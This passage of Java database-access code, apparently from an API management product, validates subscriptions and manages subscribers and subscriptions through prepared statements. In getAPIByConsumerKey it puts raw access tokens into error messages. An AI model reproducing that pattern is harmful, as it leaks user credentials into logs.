(SQLException e) { handleException("Error while executing 
SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiKeyInfoDTOs; } /** * This method is to update the access token * * @param userId id of the user * @param apiInfoDTO Api info * @param statusEnum Status of the access key * @throws APIManagementException if failed to update the access token */ public void changeAccessTokenStatus(String userId, APIInfoDTO apiInfoDTO, String statusEnum) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(userId); int tenantId = APIUtil.getTenantId(userId); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(userId, accessTokenStoreTable); String sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_DEFAULT_SUFFIX; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_CASE_INSENSITIVE_SUFFIX; } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlQuery); ps.setString(1, statusEnum); ps.setString(2, tenantAwareUsername); ps.setInt(3, tenantId); ps.setString(4, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(5, apiInfoDTO.getApiName()); ps.setString(6, apiInfoDTO.getVersion()); int count = ps.executeUpdate(); if (log.isDebugEnabled()) { log.debug("Number of rows being updated : " + count); } conn.commit(); } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { log.error("Failed to rollback the changeAccessTokenStatus operation", e1); } handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public boolean validateSubscriptionDetails(String context, String version, String consumerKey, APIKeyValidationInfoDTO infoDTO) throws APIManagementException { boolean defaultVersionInvoked = false; String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); //Check if the api version has been prefixed with _default_ if (version != null && version.startsWith(APIConstants.DEFAULT_VERSION_PREFIX)) { defaultVersionInvoked = true; //Remove the prefix from the version. 
version = version.split(APIConstants.DEFAULT_VERSION_PREFIX)[1]; } String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if (!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants .SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return false; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return false; } String apiProvider = rs.getString("API_PROVIDER"); String subTier = rs.getString("TIER_ID"); String appTier = rs.getString("APPLICATION_TIER"); infoDTO.setTier(subTier); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(apiProvider); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(appTier); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(apiProvider); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, appTier, subTier, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. 
int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. infoDTO.setThrottlingDataList(list); } return true; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } private boolean isAnyPolicyContentAware(Connection conn, String apiPolicy, String appPolicy, String subPolicy, int subscriptionTenantId, int appTenantId, int apiId) throws APIManagementException { boolean isAnyContentAware = false; // only check if using CEP based throttling. ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.IS_ANY_POLICY_CONTENT_AWARE_SQL; try { String dbProdName = conn.getMetaData().getDatabaseProductName(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiPolicy); ps.setInt(2, subscriptionTenantId); ps.setString(3, apiPolicy); ps.setInt(4, subscriptionTenantId); ps.setInt(5, apiId); ps.setInt(6, subscriptionTenantId); ps.setInt(7, apiId); ps.setInt(8, subscriptionTenantId); ps.setString(9, subPolicy); ps.setInt(10, subscriptionTenantId); ps.setString(11, appPolicy); ps.setInt(12, appTenantId); resultSet = ps.executeQuery(); // We only expect one result if all are not content aware. 
if (resultSet == null) { throw new APIManagementException(" Result set Null"); } int count = 0; if (resultSet.next()) { count = resultSet.getInt(1); if (count > 0) { isAnyContentAware = true; } } } catch (SQLException e) { handleException("Failed to get content awareness of the policies ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } return isAnyContentAware; } public void addSubscriber(Subscriber subscriber, String groupingId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.ADD_SUBSCRIBER_SQL; ps = conn.prepareStatement(query, new String[]{"subscriber_id"}); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); Timestamp timestamp = new Timestamp(subscriber.getSubscribedDate().getTime()); ps.setTimestamp(4, timestamp); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, timestamp); ps.setTimestamp(7, timestamp); ps.executeUpdate(); int subscriberId = 0; rs = ps.getGeneratedKeys(); if (rs.next()) { subscriberId = Integer.parseInt(rs.getString(1)); } subscriber.setId(subscriberId); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in adding new subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public void updateSubscriber(Subscriber subscriber) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.UPDATE_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); ps.setTimestamp(4, new Timestamp(subscriber.getSubscribedDate().getTime())); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setInt(7, subscriber.getId()); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in updating subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public Subscriber getSubscriber(int subscriberId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setInt(1, subscriberId); rs = ps.executeQuery(); if (rs.next()) { Subscriber subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(subscriberId); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setSubscribedDate(new java.util.Date(rs.getTimestamp("DATE_SUBSCRIBED").getTime())); return subscriber; } } catch (SQLException e) { handleException("Error while retrieving subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return null; } public int addSubscription(APIIdentifier identifier, String context, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; 
ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(identifier, conn); //Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_API_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); //If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { //Throw error saying subscription already exists. log.error("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants .SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants .SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API " + identifier.getApiName() + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API " + identifier.getApiName() + " through " + "application " + applicationName + " was blocked"); } } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_SUBSCRIPTION_SQL; //Adding data to the AM_SUBSCRIPTION table //ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"SUBSCRIPTION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"subscription_id"}); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? 
status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { //subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } public int addSubscription(APIProductIdentifier identifier, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiProductId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String productName = identifier.getApiProductName(); String provider = identifier.getProviderName(); apiProductId = getAPIProductID(productName, provider, conn); // Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_PRODUCT_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiProductId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); // If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { // Throw error saying subscription already exists. 
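                // A live subscription request (UNBLOCKED, ON_HOLD or REJECTED with create state
                // SUBSCRIBE) is treated as a duplicate and rejected with
                // SubscriptionAlreadyExistingException, mirroring the API-level addSubscription above.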
log.error("Subscription already exists for API Product " + productName + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API Product " + productName + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiProductIDAndAppID(apiProductId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API Product " + productName + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API Product " + productName + " through " + "application " + applicationName + " was blocked"); } } // This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_PRODUCT_SUBSCRIPTION_SQL; // Adding data to the AM_SUBSCRIPTION table // ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "SUBSCRIPTION_ID" }); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "subscription_id" }); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiProductId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { // subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } /** * Removes the subscription entry from AM_SUBSCRIPTIONS for identifier. 
 *
 * @param identifier    APIIdentifier
 * @param applicationId ID of the application which has the subscription
 * @throws APIManagementException
 */
public void removeSubscription(APIIdentifier identifier, int applicationId) throws APIManagementException {
    Connection conn = null;
    ResultSet resultSet = null;
    PreparedStatement ps = null;
    int apiId = -1;
    String uuid;
    try {
        conn = APIMgtDBUtil.getConnection();
        conn.setAutoCommit(false);
        apiId = getAPIID(identifier, conn);
        String subscriptionUUIDQuery = SQLConstants.GET_SUBSCRIPTION_UUID_SQL;
        ps = conn.prepareStatement(subscriptionUUIDQuery);
        ps.setInt(1, apiId);
        ps.setInt(2, applicationId);
        resultSet = ps.executeQuery();
        if (resultSet.next()) {
            uuid = resultSet.getString("UUID");
            SubscribedAPI subscribedAPI = new SubscribedAPI(uuid);
            removeSubscription(subscribedAPI, conn);
        } else {
            throw new APIManagementException("UUID does not exist for the given apiId:" + apiId + " and " +
                    "application id:" + applicationId);
        }
        conn.commit();
    } catch (SQLException e) {
        if (conn != null) {
            try {
                conn.rollback();
            } catch (SQLException ex) {
                log.error("Failed to rollback the remove subscription ", ex);
            }
        }
        handleException("Failed to remove subscription data ", e);
    } finally {
        APIMgtDBUtil.closeAllConnections(ps, conn, resultSet);
    }
}

/**
 * Removes a subscription specified by SubscribedAPI object
 *
 * @param subscription SubscribedAPI object
 * @param conn         database connection object
 * @throws APIManagementException
 */
public void removeSubscription(SubscribedAPI subscription, Connection conn) throws APIManagementException {
    ResultSet resultSet = null;
    PreparedStatement ps = null;
    PreparedStatement preparedStForUpdateOrDelete = null;
    String subStatus = null;
    try {
        String subscriptionStatusQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_UUID_SQL;
        ps = conn.prepareStatement(subscriptionStatusQuery);
        ps.setString(1, subscription.getUUID());
        resultSet = ps.executeQuery();
        if (resultSet.next()) {
            subStatus = resultSet.getString("SUB_STATUS");
        }
        // If the subscription is not blocked, remove the entry from the DB; else change the status and keep the entry.
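        // BLOCKED and PROD_ONLY_BLOCKED subscriptions are only flagged through UPDATE_SUBSCRIPTION_SQL
        // so the blocking record is preserved; every other state is deleted outright with
        // REMOVE_SUBSCRIPTION_SQL. Both statements are keyed on the subscription UUID.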
String updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_SQL; String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_SQL; if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus .PROD_ONLY_BLOCKED.equals(subStatus)) { preparedStForUpdateOrDelete = conn.prepareStatement(updateQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } else { preparedStForUpdateOrDelete = conn.prepareStatement(deleteQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } preparedStForUpdateOrDelete.executeUpdate(); } catch (SQLException e) { log.error("Failed to add subscriber data ", e); handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForUpdateOrDelete, null, null); } } /** * Removes a subscription by id by force without considering the subscription blocking state of the user * * @param subscription_id id of subscription * @throws APIManagementException */ public void removeSubscriptionById(int subscription_id) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscription_id); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove subscription ", e1); } } handleException("Failed to remove subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void removeAllSubscriptions(APIIdentifier apiIdentifier) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(apiIdentifier, conn); String sqlQuery = SQLConstants.REMOVE_ALL_SUBSCRIPTIONS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove all subscription ", e1); } } handleException("Failed to remove all subscriptions data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getSubscriptionStatusById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String subscriptionStatus = null; try { conn = APIMgtDBUtil.getConnection(); String getApiQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); if (resultSet.next()) { subscriptionStatus = resultSet.getString("SUB_STATUS"); } return subscriptionStatus; } catch (SQLException e) { handleException("Failed to retrieve subscription status", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the subscriptionId * * @param subscriptionId subscription id * @return {@link SubscribedAPI} Object which contains the subscribed API information. 
* @throws APIManagementException */ public SubscribedAPI getSubscriptionById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the UUID * * @param uuid UUID of Application * @return {@link SubscribedAPI} Object which contains the subscribed API information. 
* @throws APIManagementException */ public SubscribedAPI getSubscriptionByUUID(String uuid) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_UUID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setString(1, uuid); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); Timestamp createdTime = resultSet.getTimestamp("CREATED_TIME"); subscribedAPI.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = resultSet.getTimestamp("UPDATED_TIME"); subscribedAPI.setUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created subscribedAPI.setUpdatedTime(subscribedAPI.getCreatedTime()); } subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * This method used tot get Subscriber from subscriberId. 
* * @param subscriberName id * @return Subscriber * @throws APIManagementException if failed to get Subscriber from subscriber id */ public Subscriber getSubscriber(String subscriberName) throws APIManagementException { Connection conn = null; Subscriber subscriber = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriberName); String sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscriberName); ps.setInt(2, tenantId); result = ps.executeQuery(); if (result.next()) { subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setEmail(result.getString("EMAIL_ADDRESS")); subscriber.setId(result.getInt("SUBSCRIBER_ID")); subscriber.setName(subscriberName); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscriber.setTenantId(result.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Failed to get Subscriber for :" + subscriberName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, result); } return subscriber; } public Set<APIIdentifier> getAPIByConsumerKey(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getAPISql = SQLConstants.GET_API_BY_CONSUMER_KEY_SQL; Set<APIIdentifier> apiSet = new HashSet<APIIdentifier>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getAPISql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { apiSet.add(new APIIdentifier(result.getString("API_PROVIDER"), result.getString("API_NAME"), result .getString("API_VERSION"))); } } catch (SQLException e) { handleException("Failed to get API ID for token: " + accessToken, e); } catch (CryptoException e) { handleException("Failed to get API ID for token: " + accessToken, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiSet; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationName Application Name * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_SQL; 